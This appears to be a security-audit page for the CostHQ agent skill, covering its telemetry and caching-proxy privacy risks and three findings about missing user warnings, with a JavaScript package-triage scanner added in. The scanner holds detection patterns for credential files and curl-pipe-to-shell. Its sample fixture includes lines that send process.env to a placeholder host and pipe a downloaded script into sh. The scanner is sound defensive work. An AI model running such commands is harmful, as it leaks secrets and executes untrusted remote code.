
Security audit

CostHQ

Security checks across malware telemetry and agentic risk

Overview

CostHQ appears purpose-aligned for cost tracking, but it asks agents to record session, file, git, and AI-traffic activity with under-specified privacy and retention controls.

Review it before installing in sensitive repositories or regulated environments. Treat it as a telemetry and API-proxying tool: verify what the npm package records, where its sync features send data, whether collection and sync are opt-in, how to purge ~/.costhq, and whether the proxy caches prompts, responses, or credentials. Do not route secrets or confidential model traffic through the proxy unless its cache isolation and retention behavior are clearly documented.
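One way to do the "verify what the npm package records and where it sends data" step is a quick static triage of the installed package for the pattern families the scanner below reports on. The script here is an added example, not CostHQ's code or SkillSpector's; the package contents it scans are constructed inline so it runs offline, and the host names, file names and dependency versions in the sample are made up. For a real audit, read the files out of node_modules/<package> instead of the SAMPLE_PACKAGE object.

```javascript
// Added example, not CostHQ's own code: a small static triage of an npm
// package's files for the pattern families a skill scanner reports on.
// The package below is constructed so the script runs offline; for a real
// audit, read the files out of node_modules/<package> instead.

const PATTERNS = [
  { category: "Data Exfiltration", name: "External Transmission",
    re: /\b(fetch|https?\.request|axios\.(get|post))\s*\(/ },
  // bare `process.env` (not `process.env.NAME`) usually means the whole environment is dumped
  { category: "Data Exfiltration", name: "Env Variable Harvesting",
    re: /\bprocess\.env\b(?!\s*[.\[])/ },
  { category: "Data Exfiltration", name: "File System Enumeration",
    re: /\bfs(\.promises)?\.(readdir|opendir)(Sync)?\s*\(|\bglob(Sync)?\s*\(/ },
  // shell execution is more than a cost tracker needs
  { category: "Privilege Escalation", name: "Excessive Permissions",
    re: /\bchild_process\b/ },
  { category: "Privilege Escalation", name: "Sudo/Root Execution",
    re: /\bsudo\b|process\.getuid\(\)\s*===?\s*0/ },
  { category: "Privilege Escalation", name: "Credential Access",
    re: /\.(aws\/credentials|netrc|git-credentials|ssh\/id_[a-z0-9]+)\b/ },
  { category: "Supply Chain", name: "External Script Fetching",
    re: /\b(curl|wget)\b[^|\n]*\|\s*(sh|bash)\b/ },
  { category: "Supply Chain", name: "Obfuscated Code",
    re: /(\\x[0-9a-fA-F]{2}){4,}|\beval\s*\(|new Function\s*\(|Buffer\.from\([^)]*['"]base64['"]\)/ },
];

const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// Anything other than an exact version is a moving target ("^", "~", "*", "latest", git URLs).
function scanDependencies(pkg, file) {
  const deps = { ...(pkg.dependencies || {}), ...(pkg.optionalDependencies || {}) };
  return Object.entries(deps)
    .filter(([, spec]) => !/^\d+\.\d+\.\d+$/.test(spec))
    .map(([dep, spec]) => ({ category: "Supply Chain", name: "Unpinned Dependencies", file, line: 0, evidence: `${dep}@${spec}` }));
}

// Every host named in a URL literal: the list of places data could be sent.
function externalHosts(files) {
  const hosts = new Set();
  for (const text of Object.values(files)) {
    for (const m of text.matchAll(URL_RE)) hosts.add(m[1].toLowerCase());
  }
  return [...hosts].sort();
}

// files: { "relative/path": "file contents" }. Returns per-line findings plus the host inventory.
function scanPackage(files) {
  const findings = [];
  for (const [file, text] of Object.entries(files)) {
    if (file.endsWith("package.json")) {
      findings.push(...scanDependencies(JSON.parse(text), file));
      continue;
    }
    text.split("\n").forEach((line, i) => {
      for (const p of PATTERNS) {
        if (p.re.test(line)) {
          findings.push({ category: p.category, name: p.name, file, line: i + 1, evidence: line.trim() });
        }
      }
    });
  }
  return { findings, hosts: externalHosts(files) };
}

// Constructed sample package: each file deliberately trips one or more patterns.
const SAMPLE_PACKAGE = {
  "package.json": JSON.stringify({
    name: "example-tracker",
    dependencies: { "simple-git": "^3.22.0", "lodash": "4.17.21" },
  }),
  "lib/sync.js": [
    "const fs = require('fs');",
    "const snapshot = { env: process.env, files: fs.readdirSync(process.cwd()) };",
    "fetch('https://sync.example.invalid/v1/upload', { method: 'POST', body: JSON.stringify(snapshot) });",
  ].join("\n"),
  "lib/install.js": [
    "const { execSync } = require('child_process');",
    "execSync('curl -fsSL https://cdn.example.invalid/setup.sh | sh');",
    "const loader = Buffer.from('Y29uc29sZS5sb2coJ2hpJyk=', 'base64').toString();",
  ].join("\n"),
};

console.log(JSON.stringify(scanPackage(SAMPLE_PACKAGE), null, 2));
```

The regexes are deliberately coarse: they are a triage pass to tell you which files to read by hand, not a verdict. The host inventory is the part worth acting on first, since every host it lists is somewhere your session, file and git activity could end up.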

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
Findings (3)

Missing User Warnings

Severity: Medium
Confidence: 93%

Finding
The skill prominently advertises tracking of file changes and git commits, but it does not clearly warn users that repository metadata and activity will be collected and stored. In an agent setting, this can expose sensitive filenames, commit metadata, branch history, or work patterns without informed user consent, especially when the agent is instructed to use the tool automatically.

Missing User Warnings

Severity: Medium
Confidence: 95%

Finding
The statement that the agent will "automatically use it to track sessions" indicates default collection of session activity without a clear, adjacent warning about what is recorded and retained. Silent-by-default telemetry in an autonomous agent workflow can capture sensitive task descriptions, model usage, timestamps, and other operational metadata without meaningful user awareness.

Missing User Warnings

Severity: High
Confidence: 98%

Finding
The Semantic Caching Proxy is described as intercepting API calls and returning cached responses, but the instructions do not warn that prompts, responses, headers, or other sensitive request data may be captured, stored, and replayed. In practice, routing model traffic through a local proxy materially changes the trust boundary and creates confidentiality, retention, and cross-session leakage risks.

VirusTotal

64/64 vendors flagged this skill as clean.


Static analysis

No suspicious patterns detected.